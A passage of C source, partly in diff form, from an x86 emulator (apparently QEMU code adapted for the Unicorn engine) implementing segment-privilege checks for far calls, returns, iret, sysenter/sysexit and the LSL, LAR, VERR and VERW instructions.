env->hflags & HF_CPL_MASK; + type = (e2 >> DESC_TYPE_SHIFT) & 0xf; + switch (type) { + case 1: /* 286 TSS */ + case 9: /* 386 TSS */ + case 5: /* task gate */ + if (dpl < cpl || dpl < rpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + next_eip = env->eip + next_eip_addend; + 
switch_tss(env, new_cs, e1, e2, SWITCH_TSS_JMP, next_eip); + break; + case 4: /* 286 call gate */ + case 12: /* 386 call gate */ + if ((dpl < cpl) || (dpl < rpl)) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, new_cs & 0xfffc); + } + gate_cs = e1 >> 16; + new_eip = (e1 & 0xffff); + if (type == 12) { + new_eip |= (e2 & 0xffff0000); + } + if (load_segment(env, &e1, &e2, gate_cs) != 0) { + raise_exception_err(env, EXCP0D_GPF, gate_cs & 0xfffc); + } + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + /* must be code segment */ + if (((e2 & (DESC_S_MASK | DESC_CS_MASK)) != + (DESC_S_MASK | DESC_CS_MASK))) { + raise_exception_err(env, EXCP0D_GPF, gate_cs & 0xfffc); + } + if (((e2 & DESC_C_MASK) && (dpl > cpl)) || + (!(e2 & DESC_C_MASK) && (dpl != cpl))) { + raise_exception_err(env, EXCP0D_GPF, gate_cs & 0xfffc); + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0D_GPF, gate_cs & 0xfffc); + } + limit = get_seg_limit(e1, e2); + if (new_eip > limit) { + raise_exception_err(env, EXCP0D_GPF, 0); + } + cpu_x86_load_seg_cache(env, R_CS, (gate_cs & 0xfffc) | cpl, + get_seg_base(e1, e2), limit, e2); + env->eip = new_eip; + break; + default: + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + break; + } + } +} + +/* real mode call */ +void helper_lcall_real(CPUX86State *env, int new_cs, target_ulong new_eip1, + int shift, int next_eip) +{ + int new_eip; + uint32_t esp, esp_mask; + target_ulong ssp; + + new_eip = new_eip1; + esp = env->regs[R_ESP]; + esp_mask = get_sp_mask(env->segs[R_SS].flags); + ssp = env->segs[R_SS].base; + if (shift) { + PUSHL(ssp, esp, esp_mask, env->segs[R_CS].selector); + PUSHL(ssp, esp, esp_mask, next_eip); + } else { + PUSHW(ssp, esp, esp_mask, env->segs[R_CS].selector); + PUSHW(ssp, esp, esp_mask, next_eip); + } + + SET_ESP(esp, esp_mask); + env->eip = new_eip; + env->segs[R_CS].selector = new_cs; + env->segs[R_CS].base = (new_cs << 4); +} + +/* protected mode 
call */ +void helper_lcall_protected(CPUX86State *env, int new_cs, target_ulong new_eip, + int shift, int next_eip_addend) +{ + int new_stack, i; + uint32_t e1, e2, cpl, dpl, rpl, selector, offset, param_count; + uint32_t ss = 0, ss_e1 = 0, ss_e2 = 0, sp, type, ss_dpl, sp_mask; + uint32_t val, limit, old_sp_mask; + target_ulong ssp, old_ssp, next_eip; + + next_eip = env->eip + next_eip_addend; + LOG_PCALL("lcall %04x:%08x s=%d\n", new_cs, (uint32_t)new_eip, shift); + LOG_PCALL_STATE(CPU(x86_env_get_cpu(env))); + if ((new_cs & 0xfffc) == 0) { + raise_exception_err(env, EXCP0D_GPF, 0); + } + if (load_segment(env, &e1, &e2, new_cs) != 0) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + cpl = env->hflags & HF_CPL_MASK; + LOG_PCALL("desc=%08x:%08x\n", e1, e2); + if (e2 & DESC_S_MASK) { + if (!(e2 & DESC_CS_MASK)) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (e2 & DESC_C_MASK) { + /* conforming code segment */ + if (dpl > cpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + } else { + /* non conforming code segment */ + rpl = new_cs & 3; + if (rpl > cpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + if (dpl != cpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, new_cs & 0xfffc); + } + +#ifdef TARGET_X86_64 + /* XXX: check 16/32 bit cases in long mode */ + if (shift == 2) { + target_ulong rsp; + + /* 64 bit case */ + rsp = env->regs[R_ESP]; + PUSHQ(rsp, env->segs[R_CS].selector); + PUSHQ(rsp, next_eip); + /* from this point, not restartable */ + env->regs[R_ESP] = rsp; + cpu_x86_load_seg_cache(env, R_CS, (new_cs & 0xfffc) | cpl, + get_seg_base(e1, e2), + get_seg_limit(e1, e2), e2); + env->eip = new_eip; + } else +#endif + { + sp = env->regs[R_ESP]; + sp_mask = get_sp_mask(env->segs[R_SS].flags); + ssp = env->segs[R_SS].base; + if (shift) { + PUSHL(ssp, sp, sp_mask, 
env->segs[R_CS].selector); + PUSHL(ssp, sp, sp_mask, next_eip); + } else { + PUSHW(ssp, sp, sp_mask, env->segs[R_CS].selector); + PUSHW(ssp, sp, sp_mask, next_eip); + } + + limit = get_seg_limit(e1, e2); + if (new_eip > limit) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + /* from this point, not restartable */ + SET_ESP(sp, sp_mask); + cpu_x86_load_seg_cache(env, R_CS, (new_cs & 0xfffc) | cpl, + get_seg_base(e1, e2), limit, e2); + env->eip = new_eip; + } + } else { + /* check gate type */ + type = (e2 >> DESC_TYPE_SHIFT) & 0x1f; + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + rpl = new_cs & 3; + switch (type) { + case 1: /* available 286 TSS */ + case 9: /* available 386 TSS */ + case 5: /* task gate */ + if (dpl < cpl || dpl < rpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + switch_tss(env, new_cs, e1, e2, SWITCH_TSS_CALL, next_eip); + return; + case 4: /* 286 call gate */ + case 12: /* 386 call gate */ + break; + default: + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + break; + } + shift = type >> 3; + + if (dpl < cpl || dpl < rpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + /* check valid bit */ + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, new_cs & 0xfffc); + } + selector = e1 >> 16; + offset = (e2 & 0xffff0000) | (e1 & 0x0000ffff); + param_count = e2 & 0x1f; + if ((selector & 0xfffc) == 0) { + raise_exception_err(env, EXCP0D_GPF, 0); + } + + if (load_segment(env, &e1, &e2, selector) != 0) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if (!(e2 & DESC_S_MASK) || !(e2 & (DESC_CS_MASK))) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (dpl > cpl) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, selector & 0xfffc); + } + + if (!(e2 & DESC_C_MASK) && dpl < cpl) { + /* to inner privilege */ + get_ss_esp_from_tss(env, 
&ss, &sp, dpl); + LOG_PCALL("new ss:esp=%04x:%08x param_count=%d env->regs[R_ESP]=" + TARGET_FMT_lx "\n", ss, sp, param_count, + env->regs[R_ESP]); + if ((ss & 0xfffc) == 0) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + if ((ss & 3) != dpl) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + if (load_segment(env, &ss_e1, &ss_e2, ss) != 0) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + ss_dpl = (ss_e2 >> DESC_DPL_SHIFT) & 3; + if (ss_dpl != dpl) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + if (!(ss_e2 & DESC_S_MASK) || + (ss_e2 & DESC_CS_MASK) || + !(ss_e2 & DESC_W_MASK)) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + if (!(ss_e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + + /* push_size = ((param_count * 2) + 8) << shift; */ + + old_sp_mask = get_sp_mask(env->segs[R_SS].flags); + old_ssp = env->segs[R_SS].base; + + sp_mask = get_sp_mask(ss_e2); + ssp = get_seg_base(ss_e1, ss_e2); + if (shift) { + PUSHL(ssp, sp, sp_mask, env->segs[R_SS].selector); + PUSHL(ssp, sp, sp_mask, env->regs[R_ESP]); + for (i = param_count - 1; i >= 0; i--) { + val = cpu_ldl_kernel(env, old_ssp + + ((env->regs[R_ESP] + i * 4) & + old_sp_mask)); + PUSHL(ssp, sp, sp_mask, val); + } + } else { + PUSHW(ssp, sp, sp_mask, env->segs[R_SS].selector); + PUSHW(ssp, sp, sp_mask, env->regs[R_ESP]); + for (i = param_count - 1; i >= 0; i--) { + val = cpu_lduw_kernel(env, old_ssp + + ((env->regs[R_ESP] + i * 2) & + old_sp_mask)); + PUSHW(ssp, sp, sp_mask, val); + } + } + new_stack = 1; + } else { + /* to same privilege */ + sp = env->regs[R_ESP]; + sp_mask = get_sp_mask(env->segs[R_SS].flags); + ssp = env->segs[R_SS].base; + /* push_size = (4 << shift); */ + new_stack = 0; + } + + if (shift) { + PUSHL(ssp, sp, sp_mask, env->segs[R_CS].selector); + PUSHL(ssp, sp, sp_mask, next_eip); + } else { + PUSHW(ssp, sp, sp_mask, env->segs[R_CS].selector); + PUSHW(ssp, sp, sp_mask, next_eip); + } + + /* from this 
point, not restartable */ + + if (new_stack) { + ss = (ss & ~3) | dpl; + cpu_x86_load_seg_cache(env, R_SS, ss, + ssp, + get_seg_limit(ss_e1, ss_e2), + ss_e2); + } + + selector = (selector & ~3) | dpl; + cpu_x86_load_seg_cache(env, R_CS, selector, + get_seg_base(e1, e2), + get_seg_limit(e1, e2), + e2); + SET_ESP(sp, sp_mask); + env->eip = offset; + } +} + +/* real and vm86 mode iret */ +void helper_iret_real(CPUX86State *env, int shift) +{ + uint32_t sp, new_cs, new_eip, new_eflags, sp_mask; + target_ulong ssp; + int eflags_mask; + + sp_mask = 0xffff; /* XXXX: use SS segment size? */ + sp = env->regs[R_ESP]; + ssp = env->segs[R_SS].base; + if (shift == 1) { + /* 32 bits */ + POPL(ssp, sp, sp_mask, new_eip); + POPL(ssp, sp, sp_mask, new_cs); + new_cs &= 0xffff; + POPL(ssp, sp, sp_mask, new_eflags); + } else { + /* 16 bits */ + POPW(ssp, sp, sp_mask, new_eip); + POPW(ssp, sp, sp_mask, new_cs); + POPW(ssp, sp, sp_mask, new_eflags); + } + env->regs[R_ESP] = (env->regs[R_ESP] & ~sp_mask) | (sp & sp_mask); + env->segs[R_CS].selector = new_cs; + env->segs[R_CS].base = (new_cs << 4); + env->eip = new_eip; + if (env->eflags & VM_MASK) { + eflags_mask = TF_MASK | AC_MASK | ID_MASK | IF_MASK | RF_MASK | + NT_MASK; + } else { + eflags_mask = TF_MASK | AC_MASK | ID_MASK | IF_MASK | IOPL_MASK | + RF_MASK | NT_MASK; + } + if (shift == 0) { + eflags_mask &= 0xffff; + } + cpu_load_eflags(env, new_eflags, eflags_mask); + env->hflags2 &= ~HF2_NMI_MASK; +} + +static inline void validate_seg(CPUX86State *env, int seg_reg, int cpl) +{ + int dpl; + uint32_t e2; + + /* XXX: on x86_64, we do not want to nullify FS and GS because + they may still contain a valid base. 
I would be interested to + know how a real x86_64 CPU behaves */ + if ((seg_reg == R_FS || seg_reg == R_GS) && + (env->segs[seg_reg].selector & 0xfffc) == 0) { + return; + } + + e2 = env->segs[seg_reg].flags; + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (!(e2 & DESC_CS_MASK) || !(e2 & DESC_C_MASK)) { + /* data or non conforming code segment */ + if (dpl < cpl) { + cpu_x86_load_seg_cache(env, seg_reg, 0, 0, 0, 0); + } + } +} + +/* protected mode iret */ +static inline void helper_ret_protected(CPUX86State *env, int shift, + int is_iret, int addend) +{ + uint32_t new_cs, new_eflags, new_ss; + uint32_t new_es, new_ds, new_fs, new_gs; + uint32_t e1, e2, ss_e1, ss_e2; + int cpl, dpl, rpl, eflags_mask, iopl; + target_ulong ssp, sp, new_eip, new_esp, sp_mask; + +#ifdef TARGET_X86_64 + if (shift == 2) { + sp_mask = -1; + } else +#endif + { + sp_mask = get_sp_mask(env->segs[R_SS].flags); + } + sp = env->regs[R_ESP]; + ssp = env->segs[R_SS].base; + new_eflags = 0; /* avoid warning */ +#ifdef TARGET_X86_64 + if (shift == 2) { + POPQ(sp, new_eip); + POPQ(sp, new_cs); + new_cs &= 0xffff; + if (is_iret) { + POPQ(sp, new_eflags); + } + } else +#endif + { + if (shift == 1) { + /* 32 bits */ + POPL(ssp, sp, sp_mask, new_eip); + POPL(ssp, sp, sp_mask, new_cs); + new_cs &= 0xffff; + if (is_iret) { + POPL(ssp, sp, sp_mask, new_eflags); + if (new_eflags & VM_MASK) { + goto return_to_vm86; + } + } + } else { + /* 16 bits */ + POPW(ssp, sp, sp_mask, new_eip); + POPW(ssp, sp, sp_mask, new_cs); + if (is_iret) { + POPW(ssp, sp, sp_mask, new_eflags); + } + } + } + LOG_PCALL("lret new %04x:" TARGET_FMT_lx " s=%d addend=0x%x\n", + new_cs, new_eip, shift, addend); + LOG_PCALL_STATE(CPU(x86_env_get_cpu(env))); + if ((new_cs & 0xfffc) == 0) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + if (load_segment(env, &e1, &e2, new_cs) != 0) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + if (!(e2 & DESC_S_MASK) || + !(e2 & DESC_CS_MASK)) { + raise_exception_err(env, 
EXCP0D_GPF, new_cs & 0xfffc); + } + cpl = env->hflags & HF_CPL_MASK; + rpl = new_cs & 3; + if (rpl < cpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (e2 & DESC_C_MASK) { + if (dpl > rpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + } else { + if (dpl != rpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, new_cs & 0xfffc); + } + + sp += addend; + if (rpl == cpl && (!(env->hflags & HF_CS64_MASK) || + ((env->hflags & HF_CS64_MASK) && !is_iret))) { + /* return to same privilege level */ + cpu_x86_load_seg_cache(env, R_CS, new_cs, + get_seg_base(e1, e2), + get_seg_limit(e1, e2), + e2); + } else { + /* return to different privilege level */ +#ifdef TARGET_X86_64 + if (shift == 2) { + POPQ(sp, new_esp); + POPQ(sp, new_ss); + new_ss &= 0xffff; + } else +#endif + { + if (shift == 1) { + /* 32 bits */ + POPL(ssp, sp, sp_mask, new_esp); + POPL(ssp, sp, sp_mask, new_ss); + new_ss &= 0xffff; + } else { + /* 16 bits */ + POPW(ssp, sp, sp_mask, new_esp); + POPW(ssp, sp, sp_mask, new_ss); + } + } + LOG_PCALL("new ss:esp=%04x:" TARGET_FMT_lx "\n", + new_ss, new_esp); + if ((new_ss & 0xfffc) == 0) { +#ifdef TARGET_X86_64 + /* NULL ss is allowed in long mode if cpl != 3 */ + /* XXX: test CS64? */ + if ((env->hflags & HF_LMA_MASK) && rpl != 3) { + cpu_x86_load_seg_cache(env, R_SS, new_ss, + 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | (rpl << DESC_DPL_SHIFT) | + DESC_W_MASK | DESC_A_MASK); + ss_e2 = DESC_B_MASK; /* XXX: should not be needed? 
*/ + } else +#endif + { + raise_exception_err(env, EXCP0D_GPF, 0); + } + } else { + if ((new_ss & 3) != rpl) { + raise_exception_err(env, EXCP0D_GPF, new_ss & 0xfffc); + } + if (load_segment(env, &ss_e1, &ss_e2, new_ss) != 0) { + raise_exception_err(env, EXCP0D_GPF, new_ss & 0xfffc); + } + if (!(ss_e2 & DESC_S_MASK) || + (ss_e2 & DESC_CS_MASK) || + !(ss_e2 & DESC_W_MASK)) { + raise_exception_err(env, EXCP0D_GPF, new_ss & 0xfffc); + } + dpl = (ss_e2 >> DESC_DPL_SHIFT) & 3; + if (dpl != rpl) { + raise_exception_err(env, EXCP0D_GPF, new_ss & 0xfffc); + } + if (!(ss_e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, new_ss & 0xfffc); + } + cpu_x86_load_seg_cache(env, R_SS, new_ss, + get_seg_base(ss_e1, ss_e2), + get_seg_limit(ss_e1, ss_e2), + ss_e2); + } + + cpu_x86_load_seg_cache(env, R_CS, new_cs, + get_seg_base(e1, e2), + get_seg_limit(e1, e2), + e2); + sp = new_esp; +#ifdef TARGET_X86_64 + if (env->hflags & HF_CS64_MASK) { + sp_mask = -1; + } else +#endif + { + sp_mask = get_sp_mask(ss_e2); + } + + /* validate data segments */ + validate_seg(env, R_ES, rpl); + validate_seg(env, R_DS, rpl); + validate_seg(env, R_FS, rpl); + validate_seg(env, R_GS, rpl); + + sp += addend; + } + SET_ESP(sp, sp_mask); + env->eip = new_eip; + if (is_iret) { + /* NOTE: 'cpl' is the _old_ CPL */ + eflags_mask = TF_MASK | AC_MASK | ID_MASK | RF_MASK | NT_MASK; + if (cpl == 0) { + eflags_mask |= IOPL_MASK; + } + iopl = (env->eflags >> IOPL_SHIFT) & 3; + if (cpl <= iopl) { + eflags_mask |= IF_MASK; + } + if (shift == 0) { + eflags_mask &= 0xffff; + } + cpu_load_eflags(env, new_eflags, eflags_mask); + } + return; + + return_to_vm86: + POPL(ssp, sp, sp_mask, new_esp); + POPL(ssp, sp, sp_mask, new_ss); + POPL(ssp, sp, sp_mask, new_es); + POPL(ssp, sp, sp_mask, new_ds); + POPL(ssp, sp, sp_mask, new_fs); + POPL(ssp, sp, sp_mask, new_gs); + + /* modify processor state */ + cpu_load_eflags(env, new_eflags, TF_MASK | AC_MASK | ID_MASK | + IF_MASK | IOPL_MASK | VM_MASK | NT_MASK | VIF_MASK 
| + VIP_MASK); + load_seg_vm(env, R_CS, new_cs & 0xffff); + load_seg_vm(env, R_SS, new_ss & 0xffff); + load_seg_vm(env, R_ES, new_es & 0xffff); + load_seg_vm(env, R_DS, new_ds & 0xffff); + load_seg_vm(env, R_FS, new_fs & 0xffff); + load_seg_vm(env, R_GS, new_gs & 0xffff); + + env->eip = new_eip & 0xffff; + env->regs[R_ESP] = new_esp; +} + +void helper_iret_protected(CPUX86State *env, int shift, int next_eip) +{ + int tss_selector, type; + uint32_t e1, e2; + + /* specific case for TSS */ + if (env->eflags & NT_MASK) { +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + raise_exception_err(env, EXCP0D_GPF, 0); + } +#endif + tss_selector = cpu_lduw_kernel(env, env->tr.base + 0); + if (tss_selector & 4) { + raise_exception_err(env, EXCP0A_TSS, tss_selector & 0xfffc); + } + if (load_segment(env, &e1, &e2, tss_selector) != 0) { + raise_exception_err(env, EXCP0A_TSS, tss_selector & 0xfffc); + } + type = (e2 >> DESC_TYPE_SHIFT) & 0x17; + /* NOTE: we check both segment and busy TSS */ + if (type != 3) { + raise_exception_err(env, EXCP0A_TSS, tss_selector & 0xfffc); + } + switch_tss(env, tss_selector, e1, e2, SWITCH_TSS_IRET, next_eip); + } else { + helper_ret_protected(env, shift, 1, 0); + } + env->hflags2 &= ~HF2_NMI_MASK; +} + +void helper_lret_protected(CPUX86State *env, int shift, int addend) +{ + helper_ret_protected(env, shift, 0, addend); +} + +void helper_sysenter(CPUX86State *env, int next_eip_addend) +{ + // Unicorn: call registered SYSENTER hooks + struct hook *hook; + HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(env->uc, hook, UC_HOOK_INSN) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, env->eip)) + continue; + if (hook->insn == UC_X86_INS_SYSENTER) + ((uc_cb_insn_syscall_t)hook->callback)(env->uc, hook->user_data); + } + + env->eip += next_eip_addend; + return; + + if (env->sysenter_cs == 0) { + raise_exception_err(env, EXCP0D_GPF, 0); + } + env->eflags &= ~(VM_MASK | IF_MASK | RF_MASK); + +#ifdef TARGET_X86_64 + if (env->hflags & 
HF_LMA_MASK) {
        /* long mode: SYSENTER targets a 64-bit flat code segment (L bit set) */
        cpu_x86_load_seg_cache(env, R_CS, env->sysenter_cs & 0xfffc,
                               0, 0xffffffff,
                               DESC_G_MASK | DESC_B_MASK | DESC_P_MASK |
                               DESC_S_MASK |
                               DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK |
                               DESC_L_MASK);
    } else
#endif
    {
        /* legacy mode: flat 32-bit code segment */
        cpu_x86_load_seg_cache(env, R_CS, env->sysenter_cs & 0xfffc,
                               0, 0xffffffff,
                               DESC_G_MASK | DESC_B_MASK | DESC_P_MASK |
                               DESC_S_MASK |
                               DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK);
    }
    /* SS is env->sysenter_cs + 8: flat writable data segment */
    cpu_x86_load_seg_cache(env, R_SS, (env->sysenter_cs + 8) & 0xfffc,
                           0, 0xffffffff,
                           DESC_G_MASK | DESC_B_MASK | DESC_P_MASK |
                           DESC_S_MASK |
                           DESC_W_MASK | DESC_A_MASK);
    env->regs[R_ESP] = env->sysenter_esp;
    env->eip = env->sysenter_eip;
}

/* SYSEXIT: fast return to user mode from a SYSENTER system call.
 * CS/SS are derived from env->sysenter_cs (offsets +16/+24 for the
 * 32-bit flavour, +32/+40 for the 64-bit flavour), both forced to
 * privilege 3; the new stack pointer comes from ECX and the new
 * instruction pointer from EDX.  Raises #GP(0) if sysenter_cs is
 * unconfigured or the caller is not at CPL 0.
 */
void helper_sysexit(CPUX86State *env, int dflag)
{
    int cpl;

    cpl = env->hflags & HF_CPL_MASK;
    if (env->sysenter_cs == 0 || cpl != 0) {
        raise_exception_err(env, EXCP0D_GPF, 0);
    }
#ifdef TARGET_X86_64
    if (dflag == 2) {
        /* 64-bit return: CS = sysenter_cs + 32 (L bit), SS = sysenter_cs + 40 */
        cpu_x86_load_seg_cache(env, R_CS, ((env->sysenter_cs + 32) & 0xfffc) |
                               3, 0, 0xffffffff,
                               DESC_G_MASK | DESC_B_MASK | DESC_P_MASK |
                               DESC_S_MASK | (3 << DESC_DPL_SHIFT) |
                               DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK |
                               DESC_L_MASK);
        cpu_x86_load_seg_cache(env, R_SS, ((env->sysenter_cs + 40) & 0xfffc) |
                               3, 0, 0xffffffff,
                               DESC_G_MASK | DESC_B_MASK | DESC_P_MASK |
                               DESC_S_MASK | (3 << DESC_DPL_SHIFT) |
                               DESC_W_MASK | DESC_A_MASK);
    } else
#endif
    {
        /* 32-bit return: CS = sysenter_cs + 16, SS = sysenter_cs + 24 */
        cpu_x86_load_seg_cache(env, R_CS, ((env->sysenter_cs + 16) & 0xfffc) |
                               3, 0, 0xffffffff,
                               DESC_G_MASK | DESC_B_MASK | DESC_P_MASK |
                               DESC_S_MASK | (3 << DESC_DPL_SHIFT) |
                               DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK);
        cpu_x86_load_seg_cache(env, R_SS, ((env->sysenter_cs + 24) & 0xfffc) |
                               3, 0, 0xffffffff,
                               DESC_G_MASK | DESC_B_MASK | DESC_P_MASK |
                               DESC_S_MASK | (3 << DESC_DPL_SHIFT) |
                               DESC_W_MASK | DESC_A_MASK);
    }
    env->regs[R_ESP] = env->regs[R_ECX];
    env->eip = env->regs[R_EDX];
}

/* LSL: return the segment limit of the descriptor named by selector1
 * and set ZF on success; on any check failure ZF is cleared and 0 is
 * returned.  ZF is delivered through the lazy-flags source (CC_SRC).
 */
target_ulong helper_lsl(CPUX86State *env, target_ulong selector1)
{
    unsigned int limit;
    uint32_t e1, e2,
eflags, selector;
    int rpl, dpl, cpl, type;

    selector = selector1 & 0xffff;
    /* materialize current flags before CC_SRC is overwritten below */
    eflags = cpu_cc_compute_all(env, CC_OP);
    if ((selector & 0xfffc) == 0) {
        /* null selector */
        goto fail;
    }
    if (load_segment(env, &e1, &e2, selector) != 0) {
        goto fail;
    }
    rpl = selector & 3;
    dpl = (e2 >> DESC_DPL_SHIFT) & 3;
    cpl = env->hflags & HF_CPL_MASK;
    if (e2 & DESC_S_MASK) {
        if ((e2 & DESC_CS_MASK) && (e2 & DESC_C_MASK)) {
            /* conforming code segment: no privilege check */
        } else {
            if (dpl < cpl || dpl < rpl) {
                goto fail;
            }
        }
    } else {
        /* system descriptor: only types with a meaningful limit pass */
        type = (e2 >> DESC_TYPE_SHIFT) & 0xf;
        switch (type) {
        case 1: /* 286 TSS */
        case 2:
        case 3:
        case 9: /* 386 TSS */
        case 11:
            break;
        default:
            goto fail;
        }
        if (dpl < cpl || dpl < rpl) {
        fail:
            /* failure path: clear ZF, return 0 */
            CC_SRC = eflags & ~CC_Z;
            return 0;
        }
    }
    limit = get_seg_limit(e1, e2);
    CC_SRC = eflags | CC_Z;
    return limit;
}

/* LAR: load the access-rights image of the descriptor named by
 * selector1.  On success ZF is set and the masked second descriptor
 * word (e2 & 0x00f0ff00) is returned; on any failure ZF is cleared
 * and 0 is returned.  Unlike LSL, the system-descriptor switch also
 * accepts the gate types 4, 5 and 12.
 */
target_ulong helper_lar(CPUX86State *env, target_ulong selector1)
{
    uint32_t e1, e2, eflags, selector;
    int rpl, dpl, cpl, type;

    selector = selector1 & 0xffff;
    eflags = cpu_cc_compute_all(env, CC_OP);
    if ((selector & 0xfffc) == 0) {
        /* null selector */
        goto fail;
    }
    if (load_segment(env, &e1, &e2, selector) != 0) {
        goto fail;
    }
    rpl = selector & 3;
    dpl = (e2 >> DESC_DPL_SHIFT) & 3;
    cpl = env->hflags & HF_CPL_MASK;
    if (e2 & DESC_S_MASK) {
        if ((e2 & DESC_CS_MASK) && (e2 & DESC_C_MASK)) {
            /* conforming code segment: no privilege check */
        } else {
            if (dpl < cpl || dpl < rpl) {
                goto fail;
            }
        }
    } else {
        type = (e2 >> DESC_TYPE_SHIFT) & 0xf;
        switch (type) {
        case 1: /* 286 TSS */
        case 2:
        case 3:
        case 4: /* 286 call gate */
        case 5: /* task gate */
        case 9: /* 386 TSS */
        case 11:
        case 12: /* 386 call gate */
            break;
        default:
            goto fail;
        }
        if (dpl < cpl || dpl < rpl) {
        fail:
            CC_SRC = eflags & ~CC_Z;
            return 0;
        }
    }
    CC_SRC = eflags | CC_Z;
    return e2 & 0x00f0ff00;
}

/* VERR: set ZF if the segment named by selector1 is readable at the
 * current CPL/RPL, clear ZF otherwise.  ZF is delivered via CC_SRC.
 */
void helper_verr(CPUX86State *env, target_ulong selector1)
{
    uint32_t e1, e2, eflags, selector;
    int rpl, dpl, cpl;

    selector = selector1 & 0xffff;
    eflags = cpu_cc_compute_all(env, CC_OP);
    if ((selector & 0xfffc) == 0) {
        goto fail;
    }
    if
(load_segment(env, &e1, &e2, selector) != 0) {
        goto fail;
    }
    if (!(e2 & DESC_S_MASK)) {
        /* system descriptors never pass VERR */
        goto fail;
    }
    rpl = selector & 3;
    dpl = (e2 >> DESC_DPL_SHIFT) & 3;
    cpl = env->hflags & HF_CPL_MASK;
    if (e2 & DESC_CS_MASK) {
        /* code segment: must have the readable bit */
        if (!(e2 & DESC_R_MASK)) {
            goto fail;
        }
        if (!(e2 & DESC_C_MASK)) {
            /* non-conforming code: privilege check applies */
            if (dpl < cpl || dpl < rpl) {
                goto fail;
            }
        }
    } else {
        /* data segment: readable subject to privilege */
        if (dpl < cpl || dpl < rpl) {
        fail:
            /* failure path: clear ZF */
            CC_SRC = eflags & ~CC_Z;
            return;
        }
    }
    CC_SRC = eflags | CC_Z;
}

/* VERW: set ZF if the segment named by selector1 is writable at the
 * current CPL/RPL (a writable data segment passing the privilege
 * check), clear ZF otherwise.  ZF is delivered via CC_SRC.
 */
void helper_verw(CPUX86State *env, target_ulong selector1)
{
    uint32_t e1, e2, eflags, selector;
    int rpl, dpl, cpl;

    selector = selector1 & 0xffff;
    eflags = cpu_cc_compute_all(env, CC_OP);
    if ((selector & 0xfffc) == 0) {
        /* null selector */
        goto fail;
    }
    if (load_segment(env, &e1, &e2, selector) != 0) {
        goto fail;
    }
    if (!(e2 & DESC_S_MASK)) {
        goto fail;
    }
    rpl = selector & 3;
    dpl = (e2 >> DESC_DPL_SHIFT) & 3;
    cpl = env->hflags & HF_CPL_MASK;
    if (e2 & DESC_CS_MASK) {
        /* code segments are never writable */
        goto fail;
    } else {
        if (dpl < cpl || dpl < rpl) {
            goto fail;
        }
        if (!(e2 & DESC_W_MASK)) {
        fail:
            CC_SRC = eflags & ~CC_Z;
            return;
        }
    }
    CC_SRC = eflags | CC_Z;
}

/* Load a segment register, dispatching on CPU mode: real/vm86 mode
 * builds a flat 16-bit style descriptor directly, protected mode goes
 * through the full helper_load_seg checks.
 */
void cpu_x86_load_seg(CPUX86State *env, int seg_reg, int selector)
{
    if (!(env->cr[0] & CR0_PE_MASK) || (env->eflags & VM_MASK)) {
        /* vm86 segments run at privilege 3, real mode at 0 */
        int dpl = (env->eflags & VM_MASK) ?
3 : 0;
        selector &= 0xffff;
        /* real/vm86: base = selector << 4, 64 KiB limit, writable */
        cpu_x86_load_seg_cache(env, seg_reg, selector,
                               (selector << 4), 0xffff,
                               DESC_P_MASK | DESC_S_MASK | DESC_W_MASK |
                               DESC_A_MASK | (dpl << DESC_DPL_SHIFT));
    } else {
        helper_load_seg(env, seg_reg, selector);
    }
}

